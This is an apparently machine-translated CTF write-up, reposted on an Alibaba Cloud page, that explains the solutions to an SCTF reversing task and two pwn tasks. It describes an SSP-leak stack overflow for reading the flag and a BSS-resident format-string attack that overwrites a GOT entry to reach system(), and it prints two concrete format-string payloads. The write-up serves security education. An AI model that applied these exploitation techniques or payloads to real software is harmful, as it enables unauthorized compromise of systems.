Home > Others

Analysis of SCTF PWN test questions

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Re1

is a simple string encryption. The program uses multiple threads and then synchronizes. The authentication thread is not started until the encryption thread is encrypted. The problem is that IDA F5 out of the wrong, do not know is not the confusion mechanism.

Just started to see the F5 after the pseudo-code, a face confused force. Then I looked at the assembly to see what was going on.

Decryption directly hit the table can be, can also write inverse algorithm.

Pwn1

Using checksec to look at the protection mechanism, there is canary+nx protection. The vulnerability is a simple stack overflow, but there is no way to hijack a program's flow.

Since flag has been read in memory, it is thought to leak out. Later know that there is an SSP leak play, is deliberately triggered Canary protection,

And this protection mechanism will output argv[] in the program name, because the stack argv[] is the system calls the main function parameters, the stack frame must be at the current high address, so in the stack can be overwritten.

So you can go and cover it. Exp the structure is Exp=junk+flag the pointer.

Pwn2

This problem started with a bit of a crazy, because the format string vulnerability before the contact is the format of strings stored in the stack. The format string for this problem is stored in the BSS section. format string vulnerability is to write to any address, and the format of the string is not in the stack address can not be specified, so it is awkward.

Later thought can write to the stack to write an address, equivalent to construct a springboard. But the premise is that the stack must have a pointer to the stack, debugging up a look, there is really such a pointer.

So it can be constructed.

Because fflush () is called immediately after reading it, I write the got table directly. the system function has been provided, even the parameters have been push . Just cover the address directly.

Two format strings are

"%134525283x%4$n"

"%134520973x%12$n"

Analysis of SCTF PWN test questions

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More